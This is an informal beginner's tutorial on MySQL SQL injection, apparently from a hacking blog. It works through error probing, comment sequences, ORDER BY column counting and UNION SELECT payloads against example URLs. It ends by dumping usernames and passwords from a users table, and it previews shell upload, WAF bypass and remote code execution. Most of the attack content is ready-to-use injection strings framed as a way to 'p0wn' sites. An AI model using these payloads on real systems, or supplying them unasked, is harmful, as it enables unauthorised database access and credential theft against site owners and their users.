N00bz Guide to SQL Injection

Here is a N00bz guide to SQL Injetion by a N00b. Well In my last Tutorial i wrote some ways to make your way towards hacking. Hacking is a Broad Term which includes just toooo damn much...so currently we are learning Web application Pentesting and hacking. We are going to start with the Basic and common attacks which is "SQL injection". Before starting let me first tell you i am not very gud in writing an easy to understand tutorial coxz of my assumption that the reader can understand upto an extent.

Content We are Going to Discuss.

1. Basics of SQL injection.
2. Testing for SQL injection
3. Commenting out Query
4. Getting the Number of Columns
5. Collecting Information with Default Variables and Functions
6. Types of Injections
• Basic Injection (Union Based Multi Line)
• Basic Injection (Single Line or Death Row)
• The XPATH Injection
• Double Query/Sub Query Injection
• Blind SQL Injection
• Time based Blind Injection
• Evil Twin Injection
• Bypass Login Using SQL Injection
• Dump Database From Login Form
• Delete Query Injetion
• Update Query Injection
• Stored Procedure Injection
7. Interesting Places to Inject
• Get Parameter
• POST Parameter
• Referers
• User Agent
• Cookie
8. Tempering with The file System Using SQL injection
9. Uploading Shell using SQL injection
10. Automated and Manual Testing Tools
• SQLmap
• Havij
• SQLninja
• SQL Poizon
• Dark Jumper
• Enema 1.71
• SQLI-Hunter
• FatCat Auto SQL injetion
• Pangolin
• The Mole
• BSQL Hacker
• Safe3SI
• ZAP Proxy
• Burp Suite
• W3AF
• Uniscan
11. Bypassing Black Listed Filters
12. Bypassing the WAF (Web Application Firewall)
13. SiXSS/XSSQLi Attack
14. SiPhish Attack
15. SiLFI (Local File Injection via SQLi)
16. SiRFI (Remote File Injection via SQLi)
17. SiRCE (Remote Code Execution via SQLi)
18. SiDDOS (DDOSing via SQLi)
19. SiHRS Attack

I am not gonna put the whole above shit in this tutorial...but over here we ll discuss the basics and rest of the tutorials...i ll be updating later.

Basics of SQL injection

SQL injection is a Attack using which the hacker target the Database of a Website to p0wn it. Keep in mind SQL injection is not a direct attack on the DBSM, or anything which relates to database vulnerability. SQL Injection actually relates to Vulnerability in the web Application part ie the developers end. When the Input provided by the User is not properly sanitized and inserted into the query it gives the attacker a opportunity to Inject his own customized query and temper the output.

Basic Example of Reason behind the vulnerability:

I am not gonna get deep with it....just a small example for this.

www.vuln-website.com/findme.php?id=48

Lets say the query used inside the code is

Select username from users where id=<input here>

the above query will make it

Select username from users where id=48

so what if the attacker inject something like

www.vuln-website.com/fidme.php?id=48'

It will make the query to become

Select username from users where id=48'

which will now give an error:

You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near ''' at line 1

So now if he Inject something like "-48 union select database()" which will make the query like

Select username from users where id=-48 union select database()

He will get the database name...In such way he can Temper the Request and Dump the database. So now Let us start.

Testing for SQL Injection

While Injecting SQL Queries into a web application our first target is to know Understand the database Type and the Query where we are injecting. So that we can figure out the right queries to inject. In this Tutorial i am sticking with Mysql most of the things with other databases are also common just a little change in the injection. I will soon be Posting for other Databases too.



Let us for Example take this url:

www.vuln-website.com/lol.php?ssid=1

To understand the Backend Database we ll first try to generate some kind of error from the query to know the backend database.we can start injection some characters in the end of the query to generate an error.

Example :

www.vuln-website.com/lol.php?ssid=1'
www.vuln-website.com/lol.php?ssid=1"
www.vuln-website.com/lol.php?ssid=1/

If the Input is not properly Sanitized it will surely create an error.

Following are some errors from different Database types:

MySql:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1

Oracle:

ORA-00933: SQL command not properly ended

MS SQL Server:

Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string

PostgreSQL:

Query failed: ERROR: syntax error at or near "’" at character 56 in shit.php on line 20.

Let us assume we got the First Error. Which MySQL error, so now we will try to comment out rest of the Query. So that we can Inject our own query without any complication, but before that it is very important to read the error carefully so that you can understand how to close the given input, check the Error and see what is used in the Statement on both sides of the input so that you can balance the query:

Commenting Out the Query

--	:	SQL comment
--+	:	MySQL comment
-- -	:	SQL Comment
#	:	Hash comment
/*	:	C-style comment
;	:	Nullbyte
`	:	Backtick

www.vuln-website.com/lol.php?ssid=1'--
www.vuln-website.com/lol.php?ssid=1'--+
www.vuln-website.com/lol.php?ssid=1'#

So usually one of it will work and wont give any Error. We just need to stick with it and continue with the Injection.

Getting the Columns

Here is the first request we would build:

www.vuln-website.com/lol.php?ssid=1+ORDER+BY+1--

If the page refreshes OK then this generally indicates that there is a column present. We will increase the ORDER BY statement until we find where the columns end and an error is generated, thus proving we found the end. The trick is to just keep repeating until you find a count that error out.

www.vuln-website.com/lol.php?ssid=1+ORDER+BY+1,2--                    (NO Errors on Page)
www.vuln-website.com/lol.php?ssid=1+ORDER+BY+1,2,3--                 (NO Errors on Page)
www.vuln-website.com/lol.php?ssid=1+ORDER+BY+1,2,3,4--              (NO Errors on Page)
www.vuln-website.com/lol.php?ssid=1+ORDER+BY+1,2,3,4,5--           (NO Errors on Page)
www.vuln-website.com/lol.php?ssid=1+ORDER+BY+1,2,3,4,5,6--        (ERRORS FOUND)

So that Means we have 5 columns which is the last number of column which din't gave any error. Now lets check which of the Columns are giving the output on webpage.

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,3,4,5--

Lets Assume we can see 3 on the web page. so from now we will be injection in the third column.

Now we can the Best part of Injection :D

Collecting Information with Default Variables and Functions

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,database(),4,5--

As you can see i replaced 3 with "database()" which is a default function which returns the current database. It will return me the current database name. In the same manner i can use the following Functions and Variables to get more information.

• @@hostname
• @@tmpdir
• @@datadir
• @@version
• @@basedir
• @@version_compile_os
• user()
• Database()
• version()
• schema()
• UUID()
• current_user()
• current_user
• system_user()
• session_user()

Basic Injection (Union Based Multi Line)

Now let Us start Dumping the Data using Union Based Injection. To start Dumping lets see all the Databases available to current user.

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,schema_name,4,5+from+information_schema.schemata--

Now to Get the list of tables in current Database

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,table_name,4,5+from+infromation_schema.tables+where+table_schema=database()

lets say we got the following Tables:

• Posts
• Assets
• Banner
• Links
• Users

So the Most interesting out of them is Users. So we will dump it out.

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,column_name,4,5+from+infromation_schema.columns+where+table_schema=database()+and+table_name='users'--

Lets say we got the following Columns:

• id
• username
• password

To dump the all Usernames and Passwords our query will be

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,group_concat(username,0x3a,password),4,5+from+users--

If you cant get all in one Query you can use limit to get them one by one.

www.iamhappy.com/lol.php?ssid=-1+Union+Select+1,2,concat(username,0x3a,password),4,5+from+users+limit+0,1--

Keep increasing the 0 to 1,2,3,4...n to iterate through each row. An Example of For Death row Injection is here.

You can also use Evil Twin Injection in such cases.

For now that is all....will update other tutorials Listed above...soon.

Till then Happy Hacking :)

NOTE : Any Suggestion or help is highly appreciated.